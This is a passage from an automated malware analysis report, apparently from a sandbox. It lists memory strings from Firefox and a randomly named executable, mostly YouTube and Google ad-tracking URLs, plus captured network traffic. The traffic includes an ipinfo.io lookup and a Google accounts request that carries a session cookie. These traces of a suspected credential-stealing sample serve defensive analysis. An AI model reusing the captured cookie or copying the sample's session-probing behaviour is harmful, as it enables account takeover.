Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q+"&sig="+bc+"&ad_cpn=[AD_CPN]&id="+Ac+"&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]&avm="+ja},{baseUrl:"https://pagead2.googlesyndication.com/activeview_ext?id="+Ac+"&avm="+ja+"&dc_pubid="+ja+"&dc_exteid="+kb+"&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]?"}],abandonPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=video_abandon&ad_mt=[AD_MT]&ad_tos=[AD_TOS]&ad_wat=[AD_WAT]&final=[FINAL]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"10000",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei="+ba+"&m_pos="+eb+"&token=ALHj"+ma+"&index="+ja+"&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver="+c+"&m_pos_ms="+Hb}},adSlotLoggingData:{serializedSlotAdServingDataEntry:Rd}}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: resumePings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=adresume&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],skipPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rootVe:83769}},urlEndpoint:{url:"https://www.googleadservices.com/pagead/aclk?sa=L&ai=C"+B+"____________"+D+"AxAA&ase=2&num="+ja+"&cid="+oa+"&ad_cpn=%5BAD_CPN%5D&sig="+fa+"&adurl="+Oc+"&label=video_click_to_advertiser_site&ctype="+Db+"&ms=[CLICK_MS]",target:"TARGET_NEW_WINDOW",attributionSrcMode:"ATTRIBUTION_SRC_MODE_LABEL_CHROME"}},trackingParams:hb+"="}},durationMilliseconds:7E3,countdownRenderer:{timedPieCountdownRenderer:{trackingParams:hb+"="}},navigationEndpoint:{clickTrackingParams:Bc,loggingUrls:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000003.2448815938.0000023A251FB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.2454374100.0000023A25200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.facebook.com/login --attempting-deelevation equals www.facebook.com (Facebook)
Source: firefox.exe, 00000026.00000002.2494708399.000002014BF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.youtube.com --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: trackName:""},{baseUrl:"https://www.youtube.com/api/timedtext?v="+y+"&caps="+Zb+"&opi="+ic+"&xoaf="+ja+"&hl="+Ga+"&ip="+Ya+"&ipbits="+ja+"&expire="+xb+"&sparams=ip,ipbits,expire,v,caps,opi,xoaf&signature="+Ya+"&key="+Zb+"&kind="+Zb+"&lang="+Ga,name:{simpleText:ab},vssId:"a.it",languageCode:"it",kind:"asr",isTranslatable:!0,trackName:""}],audioTracks:[{captionTrackIndices:[0,1],defaultCaptionTrackIndex:0,visibility:"UNKNOWN",hasDefaultTrack:!0,captionsInitialState:"CAPTIONS_INITIAL_STATE_OFF_RECOMMENDED"}], equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: trackingParams:hb+"=",adInfoRenderer:{adHoverTextButtonRenderer:{button:{buttonRenderer:{style:"STYLE_UNKNOWN",size:"SIZE_DEFAULT",isDisabled:!1,icon:{iconType:"INFO_OUTLINE"},navigationEndpoint:{clickTrackingParams:Bc,openPopupAction:{popup:{aboutThisAdRenderer:{url:(Ih.privateDoNotAccessOrElseTrustedResourceUrlWrappedValue="https://www.youtube.com/aboutthisad?pf=web&source=youtube&reasons=A"+T+"&hl="+Ga+"&origin=www.youtube.com&ata_theme="+He,Ih),trackingParams:hb+"="}},popupType:"DIALOG"}},trackingParams:hb+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: trackingParams:hb+"=",backgroundImage:{thumbnail:{thumbnails:[{url:""}]},trackingParams:hb+"="},abandonCommands:{commands:[{clickTrackingParams:Bc,loggingUrls:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=video_abandon&ad_mt=[AD_MT]&ad_tos=[AD_TOS]&ad_wat=[AD_WAT]&final=[FINAL]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ud+"&ad_len="+Hb+"&ad_mt=[AD_MT]&ad_sys=YT%3AAdSense-Viral%2CAdSense-Viral&ad_v="+Fc+"&aqi="+ba+"&ad_rmp="+ja+"&sli="+ja}],errorPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=videoplayfailed[ERRORCODE]"}],mutePings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=admute&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994582235.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992520338.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: var xtb={url:"https://www.gstatic.com/youtube/img/useredu/smart_downloads_optin_banner.gif"}; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994582235.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992610961.0000026F5DD0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992520338.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vsb.prototype.getUrl=function(a,b){return"https://www.gstatic.com/youtube/img/icons/web/"+b.style+"/"+a+"/v"+b.version+"/"+b.size+"px.svg"};var rG=function(){}; equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993278709.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992190171.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: weight:500},{callback:function(a){if(!a.stack)return!1;var b=a.stack.trim().split("\n");b.length&&b[0].endsWith("Error: "+a.message)&&b.shift();b.length&&b[b.length-1].includes("at window.onerror (")&&b.pop();if(!b.length)return!0;if("Script error."===a.message)return b[0].includes("www.youtube.com")\|\|2<=b.length&&b[0].startsWith("at new")&&b[1].startsWith("at window.onerror");if("Unexpected token"===a.message)return!0;a=k(b);for(b=a.next();!b.done;b=a.next())if(b=b.value,!(b.includes("<anonymous>")\|\| equals www.youtube.com (Youtube)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2819553305.0000026F4E992000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com/loginM,~z0 equals www.facebook.com (Facebook)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com5 equals www.facebook.com (Facebook)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.facebook.comI equals www.facebook.com (Facebook)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.0000000001918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com1c*{, equals www.youtube.com (Youtube)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.0000000001918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com_ equals www.youtube.com (Youtube)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comxca{! equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2640984970.0000026F4E9A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2640984970.0000026F4E9CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: y+"/maxresdefault.jpg",width:1280,height:720}]},embed:{iframeUrl:"https://www.youtube.com/embed/"+Fc,width:1280,height:720},title:{simpleText:Ie},description:{simpleText:ed},lengthSeconds:"1156",ownerProfileUrl:"http://www.youtube.com/@"+Ic,externalChannelId:Gb,isFamilySafe:!0,availableCountries:"AD AE AF AG AI AL AM AO AQ AR AS AT AU AW AX AZ BA BB BD BE BF BG BH BI BJ BL BM BN BO BQ BR BS BT BV BW BY BZ CA CC CD CF CG CH CI CK CL CM CN CO CR CU CV CW CX CY CZ DE DJ DK DM DO DZ EC EE EG EH ER ES ET FI FJ FK FM FO FR GA GB GD GE GF GG GH GI GL GM GN GP GQ GR GS GT GU GW GY HK HM HN HR HT HU ID IE IL IM IN IO IQ IR IS IT JE JM JO JP KE KG KH KI KM KN KP KR KW KY KZ LA LB LC LI LK LR LS LT LU LV LY MA MC MD ME MF MG MH MK ML MM MN MO MP MQ MR MS MT MU MV MW MX MY MZ NA NC NE NF NG NI NL NO NP NR NU NZ OM PA PE PF PG PH PK PL PM PN PR PS PT PW PY QA RE RO RS RU RW SA SB SC SD SE SG SH SI SJ SK SL SM SN SO SR SS ST SV SX SY SZ TC TD TF TG TH TJ TK TL TM TN TO TR TT TV TW TZ UA UG UM US UY UZ VA VC VE VG VI VN VU WF WS YE YT ZA ZM ZW".split(" "), equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: y,target:"TARGET_NEW_WINDOW"}},trackingParams:hb+"="}},trackingParams:hb+"="}}}},endscreen:{endscreenRenderer:{elements:[{endscreenElementRenderer:{style:"CHANNEL",image:{thumbnails:[{url:"https://yt3.ggpht.com/"+Va+"=s250-c-k-c0x00ffffff-no-rj",width:250,height:250},{url:"https://yt3.ggpht.com/"+Va+"=s400-c-k-c0x00ffffff-no-rj",width:400,height:400}]},icon:{thumbnails:[{url:"https://www.gstatic.com/youtube/img/annotations/youtube.png"}]},left:.030214407,width:.15438597,top:.37587035,aspectRatio:1, equals www.youtube.com (Youtube)
Source: 1247451676yCt7-%pCl7a%y3efrd-9l.sqlite.51.dr	String found in binary or memory: yt-player-local-media:V5af29df3\|\|https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_MILLISECONDS",adTimeOffset:{offsetStartMilliseconds:ac,offsetEndMilliseconds:ac},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"10000",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei="+ba+"&m_pos="+Db+"&token=ALHj"+ma+"&index="+ja+"&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {adPlacementRenderer:{config:{adPlacementConfig:{kind:"zf",adTimeOffset:{offsetStartMilliseconds:"63",offsetEndMilliseconds:"83"},hideCueRangeMarker:!0}},renderer:{adBreakServiceRenderer:{prefetchMilliseconds:"59",getAdBreakUrl:"https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVxobLOmsF6L503baqxgf8zHtyL78tfro_JRoNlfUoKtHWX2jso_GFC-H_ls4xj56iIKpT0KTxmL6pBydJcB_KTnotW1Kxo4HXObZOq6QB1pko2sTXpiLrkJms8CUEhtmyJi4JLbzgqpKLHDEPl661jo3yXCRv0JEFo_M8Kbs-NJqqhNk-CRJ_s8hTmbiMZPaPBDZtVQ-NB0zXsJDIwj2XvPAaTetL-zmXE540lFCFBTmjXZ_xJyO2NATx6lkN7RoJZL2oRwXCH1rZDjXoOvFwjXFWV9JSPwCRzajtfJUVyGROxkM6BX896KoL4rFXfYzJZBZ1QOvbMxJD4laKN5xMb5KPz5Jq54KXXO76NpvMuOlkHb5qf-k2-Z&index=2&cpn=[CPN]&lact=[LACT]&vis=[VIS]&ad_block=[AD_BLOCK]&tsla=[TSLA]&bid=[BISCOTTI_ID]&dt=[DT]&flash=[FLASH]&frm=[FRM]&ca_type=[CA_TYPE]&u_tz=[U_TZ]&u_his=[U_HIS]&u_java=[U_JAVA]&u_h=[U_H]&u_w=[U_W]&u_ah=[U_AH]&u_aw=[U_AW]&u_cd=[U_CD]&u_nplug=[U_NPLUG]&u_nmime=[U_NMIME]&p_w=[P_W]&p_h=[P_H]&c=WEB&cver=2.20231003.02.02&m_pos_ms=330200"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],activeViewFullyViewableAudibleHalfDurationPings:[{baseUrl:"https://www.youtube.com/pcs/activeview?xai="+q+"&sig="+bc+"&ad_cpn=[AD_CPN]&id="+Ac+"&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]&avgm="+ja},{baseUrl:"https://pagead2.googlesyndication.com/activeview_ext?id="+Ac+"&dc_pubid="+ja+"&dc_exteid="+kb+"&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]?"}], equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],activeViewViewablePings:[{baseUrl:"https://www.youtube.com/pcs/activeview?xai="+q+"&sig="+bc+"&ad_cpn=[AD_CPN]&id="+Ac+"&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://pagead2.googlesyndication.com/activeview_ext?id="+Ac+"&dc_pubid="+ja+"&dc_exteid="+kb+"&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]?"}], equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],pingingEndpoint:{hack:!0}}]},adRendererCommands:{impressionCommand:{clickTrackingParams:Bc,commandExecutorCommand:{commands:[{clickTrackingParams:Bc,loggingUrls:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=video_card_endcap_impression"}], equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {baseUrl:"https://www.youtube.com/pagead/adview?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&ad_cpn=[AD_CPN]&lact=[LACT]"},{baseUrl:"https://www.youtube.com/api/stats/ads?ver="+ja+"&ns="+ja+"&event="+ja+"&device="+ja+"&content_v="+y+"&el="+ed+"&ei="+ba+"&devicever="+c+"&bti="+ib+"&format="+ac+"&break_type="+ja+"&conn=[CONN]&cpn=[CPN]&lact=[LACT]&m_pos="+ja+"&mt=[MT]&p_h=[P_H]&p_w=[P_W]&rwt=[RWT]&sdkv="+Ya+"&slot_pos="+ja+"&slot_len="+ja+"&vis=[VIS]&vol=[VOL]&wt=[WT]&ad_cpn=[AD_CPN]&ad_id="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {instreamVideoAdRenderer:{skipOffsetMilliseconds:5E3,pings:{impressionPings:[{baseUrl:"https://ad.doubleclick.net/ddm/trackimp/N1957659.127733GOOGLE-YOUTUBE/B29940965.366940103;dc_trk_aid="+ic+";dc_trk_cid="+ic+";ord="+xb+";dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;ltd=;dc_tdv="+ja+";dc_rui="+ja+";dc_exteid="+kb+";dc_av="+Db+";dc_sk="+ja+";dc_ctype="+eb+";dc_ref=http://www.youtube.com/video/"+Fc+";dc_pubid="+ja+";dc_btype=23?gclid="+Na+"&ase=2",attributionSrcMode:"ATTRIBUTION_SRC_MODE_LABEL_CHROME"}, equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: ipinfo.io

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:34:48 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:34:48 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:34:49 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:34:49 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:34:50 GMTServer: gvs 1.0
